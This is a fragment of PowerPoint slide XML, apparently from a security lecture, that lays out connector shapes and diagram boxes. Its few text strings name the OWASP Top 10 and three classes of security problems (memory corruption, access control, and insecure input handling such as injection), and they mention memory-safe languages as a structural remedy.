              <a:endCxn id="163" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1332960" y="1926401"/>
              <a:ext cx="360000" cy="4392000"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 66282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or: Curved 224">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD754554-1EF4-E6B5-C0A2-1931D4CCFB46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="115" idx="3"/>
              <a:endCxn id="128" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1332960" y="1926401"/>
              <a:ext cx="406440" cy="11096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9A19C6A4-2F9F-C069-C5C5-3CF583A006E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="127" idx="3"/>
              <a:endCxn id="110" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1332960" y="1371121"/>
              <a:ext cx="406440" cy="1664880"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 24041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F8D74C91-0359-B70C-5066-61318658AFC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="138" idx="3"/>
              <a:endCxn id="116" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1332960" y="1926401"/>
              <a:ext cx="406440" cy="2216820"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 29810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or: Curved 229">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E68BCF57-CAA6-27EC-A902-E077745A3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8800" y="4135129"/>
              <a:ext cx="415080" cy="166584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B4C7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or: Curved 230">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF9AC816-C9F2-0678-0FF7-50882AA8B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7419" y="5736542"/>
              <a:ext cx="468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7B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Curved 231">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{757CC8C0-2881-7A12-1076-15D907CAF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5967" y="2475661"/>
              <a:ext cx="406440" cy="2216820"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 35578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or: Curved 233">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64392002-B8E2-2A34-D954-3DFA94671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3970" y="3594061"/>
              <a:ext cx="412933" cy="112260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2113C81D-B2E5-A848-54A5-7363055884CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="142" idx="3"/>
              <a:endCxn id="124" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5866800" y="2481681"/>
              <a:ext cx="415080" cy="166584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CC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or: Curved 243">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27B7A6BA-3362-98A3-4C1F-0A813DC36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2659" y="5848619"/>
              <a:ext cx="468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84DC1EE-1320-162F-EEEC-FFB8D40CB73B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4265513" y="1410781"/>
              <a:ext cx="481966" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="53975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1406CE95-BD7D-0A64-7D0B-6ACA26FAAAE3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5799914" y="1936501"/>
              <a:ext cx="481966" cy="0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56362AFE-D6FC-9081-1239-094DC1986635}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4305622" y="6368641"/>
              <a:ext cx="481966" cy="0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45D06D9F-D5E9-C0B8-82C3-9FAF16747371}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5809453" y="5810046"/>
              <a:ext cx="481966" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="53975">
              <a:solidFill>
                <a:srgbClr val="B4C7D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CF5EA3EC-DEF2-7D4F-4123-EF7BF55C54E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1253356" y="5257001"/>
              <a:ext cx="481966" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="53975">
              <a:solidFill>
                <a:srgbClr val="FFCC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CD4A065B-21E4-BBE5-E960-E1222EC27C9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4276754" y="3031801"/>
              <a:ext cx="481966" cy="0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F5B69B89-5C67-BD0E-6DAE-F65127719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73767" y="3031801"/>
              <a:ext cx="481966" cy="0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4C5C6904-D6A5-3E9D-8D85-751351DC3CDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2803755" y="3594061"/>
              <a:ext cx="468000" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="539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or: Curved 257">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D44B7E-6BCF-79F4-A6F2-FFFC8F6A2314}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5858644" y="2979481"/>
              <a:ext cx="410747" cy="557000"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 41438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B86956B8-27EB-2E4B-EDED-91601F4BFF2C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5787425" y="1337401"/>
              <a:ext cx="481966" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="53975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or: Curved 259">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{732C962C-E313-C503-949D-FC0CB3147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3464" y="4151521"/>
              <a:ext cx="468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C8B2E616-7543-D1CC-5B1D-75BD0364F0C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7322660" y="5241848"/>
              <a:ext cx="481966" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="53975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10A65256-A5A1-73B0-CCDE-8A2A7DA4E02C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2786186" y="5778655"/>
              <a:ext cx="481966" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="53975">
              <a:solidFill>
                <a:srgbClr val="FF9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or: Curved 269">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CDACF04-193B-AAF6-DAA9-4C90E253F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248" y="1907241"/>
              <a:ext cx="432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nector: Curved 295">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41758E59-06D3-5BD5-0B4A-C96C04EB95AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4340456" y="3592562"/>
              <a:ext cx="432000" cy="1620000"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 36431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03FA739-6949-2DDE-837B-3512AD421997}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="140" idx="3"/>
              <a:endCxn id="8" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4356973" y="3596161"/>
              <a:ext cx="401747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or: Curved 98">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B540AC-AB85-FF33-BEAD-D4B4E5AFA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3707" y="1924979"/>
              <a:ext cx="468000" cy="542760"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 35410"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="57150">
              <a:solidFill>
                <a:srgbClr val="FFCC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B8DF8A47-2163-B1D4-BA12-F36AC1A2C283}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7281724" y="1907241"/>
              <a:ext cx="504000" cy="2772000"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 40696"/>
              </a:avLst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or: Curved 216">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6C3BAEF-3F35-5612-9C58-755E4E0BCF60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274962" y="3025329"/>
              <a:ext cx="576000" cy="504000"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 41438"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="57150">
              <a:solidFill>
                <a:srgbClr val="FFE5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FD9E4511-A5EA-F50F-5B5C-F36FEE3C1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7086" y="3608091"/>
              <a:ext cx="468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Connector: Curved 298">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{261A4C54-7442-9CF0-CF92-565905403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6543" y="3653186"/>
              <a:ext cx="412933" cy="1584000"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 58517"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="57150">
              <a:solidFill>
                <a:srgbClr val="008000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0EB6EFDA-B480-39EB-2362-03D7586936FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5822428" y="3589661"/>
              <a:ext cx="468000" cy="557000"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 41438"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="57150">
              <a:solidFill>
                <a:srgbClr val="0066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CBB252D5-61D3-ACC3-6386-68EF476A9E63}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2803091" y="4135129"/>
              <a:ext cx="468000" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5397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or: Curved 303">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D8D80AD-B52A-85BC-52CB-F54ED2FEE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0352" y="4135129"/>
              <a:ext cx="415080" cy="166584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7B59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88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{303CA8F5-29E1-990C-E70D-40B4D2968F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5731" y="4136928"/>
              <a:ext cx="432000" cy="54276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CC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nector: Curved 311">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5C8F0FD-123E-907A-04E6-B0B208AAE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3235" y="3802885"/>
              <a:ext cx="468000" cy="2592000"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 44231"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="57150">
              <a:solidFill>
                <a:srgbClr val="008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168F1BE-E2CC-9C6E-081C-E7F4718DB16F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="276226"/>
            <a:ext cx="7761288" cy="585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/>
              <a:t> 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OWASP Top 10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8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1DA94-53E9-6B38-F3AF-C9748DEC4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3DDE9E-BAB5-A0C9-C407-1D693EB5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three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B4FFC5-A966-D1AB-C295-C9B30E6BE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big three classes of security problems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memory corruption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access control   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incl.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authentication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insecure input handling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, esp. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Structural solutions?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Memory-safe languages!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Access control problems probably hardest to structurally prevent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Techniques for secure input handling can provide structural improvement, as we’ll discuss next weeks</a:t>
            </a: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lvl="1"/>
            <a:endParaRPr lang="en-US" dirty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500D9-03C1-BE0B-C82E-A9DD0C3A87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3A9F61A-0238-41AE-BB0B-6E00DBB90FAC}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>44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177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6EF7-C785-7A35-0AD1-BCD42455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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>hier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2A74-D3D0-859D-EFC2-82F398FA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92F9-B9D3-5ABD-A5C7-06CAE479275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4030825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46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/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FF9900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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2832222" y="3160594"/>
            <a:ext cx="1556307" cy="54030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/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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1023557" y="3145118"/>
            <a:ext cx="1052685" cy="44268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/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/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/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/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/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/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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2924931" y="1967312"/>
            <a:ext cx="1369656" cy="106881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Many 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overlaps,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/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/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/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/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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23104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130F-E500-1242-9F7E-A863A67B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1067A84C-A935-F5AB-4197-DD9216BEC8DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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A1736E-5444-506F-6F4F-A7A0CFFA5F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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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38595A7-A03B-92D3-644F-D545B9F733C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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746DD9-93DC-2FE1-BC8C-E6F2C2325CCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9621705E-79CA-7B25-4891-C8E3DF70EDD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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0D2719DF-FC98-B666-D682-0AFA0CAA5D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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FD11E2F7-E0B7-1E3D-1E62-BAC8574F062F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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0DFD201-9565-D5FF-EC7C-2F8065A3F4B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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EA66FE76-83FC-DE45-46BF-5B705D3E8CF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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047C2470-37BE-0711-4412-866FB93646FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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C0AD0721-4A14-FA30-75C4-2E6D841478A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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FF9900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2215823A-954F-90EC-BF34-453EA1861A02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7EF6C0DB-E414-9B5F-29FF-CA942E0F5A57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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27183976-1097-5A8E-3B96-4D505A08FCB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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EF81F916-54D9-55C4-04D5-0875F4D6F44D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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15D1A12E-D0C4-B282-EC93-AF1F477178D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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4DB95A5A-2D84-2177-95B8-0B5FA6DABC52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2832222" y="3160594"/>
            <a:ext cx="1556307" cy="54030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9039F91C-367D-15A3-5784-816E2BBE9C7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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BAD5327B-8023-3BE8-3782-7EB0D743C958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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3931110D-976E-A8E4-6730-4BC18160E055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1023557" y="3145118"/>
            <a:ext cx="1052685" cy="44268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ECBF2D18-7705-475C-0F39-B347C48D9A5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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2547ACFB-1A58-CA98-52A2-F25529ECC21F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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EBA17E3C-2C1E-A6C0-1454-B572A71BBAA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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F9951A4F-1824-94ED-2DE2-25CC793ED531}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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2BCB5723-3F86-0815-71F0-FDDA573F794B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7C5E1705-6EED-4EEB-49AC-B16BC595FA0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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DAF143F8-92EC-2E73-5A3D-4A6F5AF83DE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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39EE1E03-BCFE-8961-DFEE-93BB189FAD78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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8C65CE78-C415-6A5D-A4CC-38704ABC46CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2924931" y="1967312"/>
            <a:ext cx="1369656" cy="106881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D508D3C-102B-03FE-93C1-C71A565FEB84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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Many 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overlaps,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662EDC19-8707-1637-EC0B-4AD380BC876C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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3EF709F5-1F4A-A58B-C3BB-18E57AE06A88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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6C694BAA-1F28-5DCA-AE7E-073EFF955AA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7383D9BE-FAAB-C672-5E82-D67F4034DE6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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37845D-866A-0C03-F17F-C0738C35DF2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="871222" y="1441645"/>
            <a:ext cx="5742899" cy="2278257"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="339933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ACCESS CONTROL problems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34BB8D-170E-B48B-CC61-ED19FBA0E354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="893717" y="3801242"/>
            <a:ext cx="5742899" cy="2369703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INPUT problems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7C498-B399-69CF-E481-478D947E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DD51620-4D94-C613-7C86-B97E7BBA14F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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B61254-F5F2-FAA4-0C83-819068BB1F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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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79A538-6169-3F01-EAD7-B4E5DA74CE16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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968550-464A-7C25-D9D4-8C1A805FE379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D3AC0F3-51BA-E694-1215-569F9833D97A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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45B7BAF-C330-2B22-1969-BB7ABE2C40D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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4CF39913-C90C-AE0D-850C-E0CFC9D2D3EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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409755D-B14D-68A8-B727-49E64E7BFDA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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BCCE0977-9EAD-60D4-3C81-FFF58B49713D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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B86E1EAF-0B14-5EC8-2DF5-766788B180F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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9EA95BC0-9C33-0617-E5CC-6DD427D4D6C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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rgbClr val="FF9900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1333478C-74B5-8224-5C4E-849AD3E8CD76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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F692EB30-B795-22F5-84BA-2F14A1F5ADD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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2DC7863B-FC0F-7681-27FB-88F7C7AB490B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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5FF6528E-965E-D581-989B-E29B85DCE166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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72222F32-68D1-6685-6698-46E14A27AB3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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FA659C39-11D7-1809-9181-3759FECA838E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2832222" y="3160594"/>
            <a:ext cx="1556307" cy="54030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A7303846-5007-61C4-8BD3-6182A5F90E54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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176E6B5A-220D-89F7-81C3-F9A3D22E22EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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13D48A45-8AB9-EB46-D568-85FA365FE029}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1023557" y="3145118"/>
            <a:ext cx="1052685" cy="44268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3AB00F0-B3F4-5909-C5D0-8CC595A1941B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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539FB49F-3F9B-4FE8-6A71-F1AD26840573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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322210A9-D7B3-CDC4-E49F-DCB918B47D38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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BBFF7E77-BD3A-D6EF-5E51-481C94F66739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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261D9CD9-2756-9BCC-D3CD-D418C8C37E72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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5DBF512F-B630-CA41-6466-692839B2A933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
